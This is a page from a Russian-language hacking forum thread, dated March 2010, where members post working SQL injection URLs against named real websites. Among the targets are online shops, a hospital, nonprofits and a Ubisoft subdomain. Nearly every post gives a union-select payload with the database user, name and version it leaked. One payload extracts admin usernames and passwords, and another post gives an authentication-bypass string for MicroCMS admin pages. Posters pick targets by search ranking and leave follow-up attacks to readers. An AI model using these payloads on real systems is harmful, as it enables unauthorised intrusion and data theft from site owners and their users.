ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11671  
Старый 25.03.2010, 19:47
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.stevenalan.com/product.php?defvarid=1666&productid=16316&cat=933&manufacturerid=1+union+select+concat_ws(0x3a,user(),database(),version())--
User: stevenshop@localhost
Database: steven_shop
Version: 4.1.22-standard-log

Код:
http://blacknetdaily.com/index.php?p=read&a=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
User: bndaily@72.167.131.53
Database: bndaily
Version: 4.1.22-max-log

Последний раз редактировалось root_sashok; 25.03.2010 в 20:19..
 
Ответить с цитированием

  #11672  
Старый 25.03.2010, 20:59
Аватар для AKYLA
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию

Цитата:
http://www.macdirectory.com/index.php?option=com_software&task=viewDetail&soft ware_id=-1+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,V ersion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0 x7873716C696E6A656E64)-- -
Database Version: 5.0.86
System User: macdirect@localhost
Host Name: server.macdirectory.com
Installation dir: /usr/
DB User: 'macdirect'@'localhost'
Базы: information_schema
macdirect_ad
macdirect_db
test
Система: Joomla
PR 5
ТиЦ 10
 
Ответить с цитированием

  #11673  
Старый 25.03.2010, 22:37
Аватар для b82a
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Цитата:
http://www.i-eye.no/liste.php?id=-6%20UNION%20SELECT%201,2,3,4,5,6,7,concat_ws%280x3 a,user%28%29,%20database%28%29,version%28%29%29,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20--+
User: ieye_user@localhost
Database: ieye_ieye
Version: 4.1.22-standard
 
Ответить с цитированием

  #11674  
Старый 26.03.2010, 01:18
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.cbdc.ca/stories.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
User: web6u1@localhost
Database: web6db1
Version: 5.0.7

PR 5.

Код:
http://www.fotoskaitmena.lt/content.php?id=66+union+select+concat_ws(0x3a,11111,user(),database(),version())--
User: dwk@localhost
Database: dwk
Version: 5.0.45

11111 в данном случае не несет никакой информации, но помогает вывести User'a.

Последний раз редактировалось root_sashok; 26.03.2010 в 01:34..
 
Ответить с цитированием

  #11675  
Старый 26.03.2010, 08:45
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
http://www.zeturija.lt/microcms-admin-home.php
admin" or "admin"="admin" /*
пасс любой
Цитата:
http://www.bistroboheme.se/microcms-admin-home.php
admin" or "admin"="admin" /*
пасс любой

Последний раз редактировалось Strilo4ka; 26.03.2010 в 09:09..
 
Ответить с цитированием

  #11676  
Старый 26.03.2010, 19:43
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.stnicholashospital.org/providers/provider_info.php?pp=142+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+
User: stnick_cat@localhost
Database: stnick_catalog
Version: 5.0.89-community-log

PR 5.

Код:
http://der-antiaggressionstrainer.com/galerie/view.php?id=2+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14--
User: patrik@localhost
Database: galerie
Version: 5.0.45

Код:
http://masfan.com/index.php?component=ecommerce&action=view&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
Красивый сайт с кучей полей.

User: masfanс_masfan@localhost
Database: masfanс_masfan
Version: 5.0.89-community-log

Код:
http://cmx.ubi.com/viewpgn.php?gameid=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version())--
Смотрите-ка, что я нашел. За ваши дальнейшие действия не отвечаю... Хотя, таблицы достать нельзя. Не знаю, что вам там в голову придет. Так, запостил для информации.

User: cmxdb@cmt4.web.mdc.ubisoft.com
Database: cmx
Version: 5.0.45-log

Последний раз редактировалось root_sashok; 26.03.2010 в 21:01..
 
Ответить с цитированием

  #11677  
Старый 26.03.2010, 22:42
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://dragobarzini.com/query.php?vote=-4+and+1=0+union+select+1,concat(username,char(58), password),3+from+admin

user() : dragobar_votes@localhost

version() : 5.0.89-community-log

database() : dragobar_votes



http://www.tnak.am/sub/opros.php?quest_id=34+and+1=0+union+select+1,2,3

user() : tnakam_hvh13@localhost

version() : 5.0.89-community

database() : tnakam_tnaks
 
Ответить с цитированием

  #11678  
Старый 26.03.2010, 22:55
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от KENT1994  
PHP код:
http://knockonmydoor.com/wholesale/newsletter.php?id=1 
сайт мего крутой корпорации
целый день убил ради сс и х*й

Host IP: 66.117.14.58
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL unknown ver
Current DB: knocko7_newe

http://knockonmydoor.com/wholesale/newsletter.php?id=1+and+1=0+union+select+1,2,3,4,5 ,6,7,8--

 
Ответить с цитированием

  #11679  
Старый 27.03.2010, 01:54
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

Код:
http://www.mondialisations.org/php/public/liste.php?r=558+union+select+concat_ws(0x3a,user(),database(),version()),2--
Username: mondial@localhost
Database: mondial
Version: 4.1.20

Код:
http://www.stpatricks.org.au/printpage.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
Username: stpats@localhost
Database: stpats
Version: 5.0.32-Debian_7etch5-lo

Title. Есть users.

Код:
http://calendar.templemenorahmiami.org/eventdisplay.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2,3--
Username: dbo292889623@74.208.16.212
Database: db292889623
Version: 5.0.81-log

Код:
http://swim.wellsreserve.org/stories.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,user(),database(),version()))),6,7,8,9--
Username: srichardson@soy.dreamhost.com
Database: anguilla
Version: 4.1.16-standard-log

Код:
http://www.healthaccessproject.org/vpn_output.php?practice=-1+union+select+unhex(hex(concat_ws(0x3a,user(),database(),version()))),2--
Username: healthaccess@tuna5.xmission.com
Database: healthaccess
Version: 4.1.11-Debian_4sarge8-log

KENT1994, чтобы не терли посты — приводи инъекцию в нормальный вид. После ID дописывай количество колонок. В начале темы написано.

Последний раз редактировалось root_sashok; 27.03.2010 в 03:56..
 
Ответить с цитированием

  #11680  
Старый 27.03.2010, 15:08
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://cpod.org.au/page.php?id=-144+union+select+1,2,3,4,5,6,7,8+--+
Version: 5.0.45
User: CBAA@localhost
Database: cbaa
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ